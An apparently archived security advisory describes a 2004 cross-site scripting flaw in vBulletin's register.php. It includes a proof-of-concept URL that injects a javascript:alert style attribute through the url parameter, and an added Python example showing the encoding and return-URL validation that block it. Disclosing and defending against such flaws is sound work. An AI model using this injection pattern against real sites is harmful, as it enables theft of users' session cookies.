JelSoft VBulletin Cross-Site Scripting Vulnerability
BID:9649
| Bugtraq ID: | 9649 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 12 2004 12:00AM |
| Updated: | Feb 12 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Jamie Fisher <[email protected]>. |
| Vulnerable: | Jelsoft vBulletin 2.3.4; Jelsoft vBulletin 2.3.3; Jelsoft vBulletin 2.3; Jelsoft vBulletin 2.2.9 can; Jelsoft vBulletin 2.2.8; Jelsoft vBulletin 2.2.7; Jelsoft vBulletin 2.2.6; Jelsoft vBulletin 2.2.5; Jelsoft vBulletin 2.2.4; Jelsoft vBulletin 2.2.3; Jelsoft vBulletin 2.2.2; Jelsoft vBulletin 2.2.1; Jelsoft vBulletin 2.2 .0; Jelsoft vBulletin 2.0.2; Jelsoft vBulletin 2.0.1; Jelsoft vBulletin 2.0 beta 3; Jelsoft vBulletin 2.0 beta 2; Jelsoft vBulletin 2.0; Jelsoft vBulletin 1.1.6; Jelsoft vBulletin 1.1; Jelsoft vBulletin 1.0 Lite |
| Not Vulnerable: | |
Discussion
It has been reported that VBulletin is prone to a cross-site scripting vulnerability. The issue is reportedly due to a failure to sanitize user-supplied input, which allows HTML and script code that may facilitate cross-site scripting attacks. Successful exploitation may allow theft of cookie-based authentication credentials or other attacks.
Exploit / POC
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/forum/register.php?s=60b7ac47d0eba9853b6e36a3b18924bc&s=&do=register&url=AK%22%20style%3D%22background:url(javascript:alert(%27XSS%20Vulnerable%20To%20Cross%20Site%20Scripting%27))%22%20OS%22&month=0&day=0&year=0&who=adult&agree=1
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
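An added example (not from the original advisory or from Jelsoft's code) of the attribute encoding and return-URL validation that close this class of flaw, run against the proof-of-concept request above. The hidden-field template, the function names and the allowed host are assumptions; the advisory does not show vBulletin's markup.

```python
import html
from urllib.parse import urlsplit, parse_qs

# The proof-of-concept request from this advisory, embedded as sample input.
POC = ("http://www.example.com/forum/register.php?s=60b7ac47d0eba9853b6e36a3b18924bc"
       "&s=&do=register&url=AK%22%20style%3D%22background:url(javascript:alert("
       "%27XSS%20Vulnerable%20To%20Cross%20Site%20Scripting%27))%22%20OS%22"
       "&month=0&day=0&year=0&who=adult&agree=1")

# Assumed template: the payload's leading double quote implies the value is
# reflected inside a double-quoted attribute, but the real markup is not shown.
TEMPLATE = '<input type="hidden" name="url" value="{}">'

def url_param(request_url):
    """Return the decoded `url` query parameter (empty string if absent)."""
    query = parse_qs(urlsplit(request_url).query, keep_blank_values=True)
    return query.get("url", [""])[-1]

def render_unsafe(value):
    """Vulnerable pattern: raw interpolation into a quoted attribute."""
    return TEMPLATE.format(value)

def render_safe(value):
    """Encode &, <, >, " and ' so the value cannot close the attribute."""
    return TEMPLATE.format(html.escape(value, quote=True))

def is_safe_return_url(value, host="www.example.com"):
    """Accept only site-relative paths or http(s) URLs on our own host."""
    if any(c in value for c in '"\'<>\\') or any(ord(c) < 0x20 for c in value):
        return False
    parts = urlsplit(value)
    if not parts.scheme and not parts.netloc:
        return value.startswith("/") and not value.startswith("//")
    return parts.scheme in ("http", "https") and parts.hostname == host

if __name__ == "__main__":
    value = url_param(POC)
    print("decoded url parameter:", value)
    print("unsafe render:", render_unsafe(value))
    print("safe render:  ", render_safe(value))
    print("accepted as return URL:", is_safe_return_url(value))
```

Validation and encoding are complementary: the validator rejects the request early, while encoding at output time protects any value that reaches the template by another path.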
References
References:
- Vendor Homepage (Kyberna)
- VBulletin (Jamie Fisher)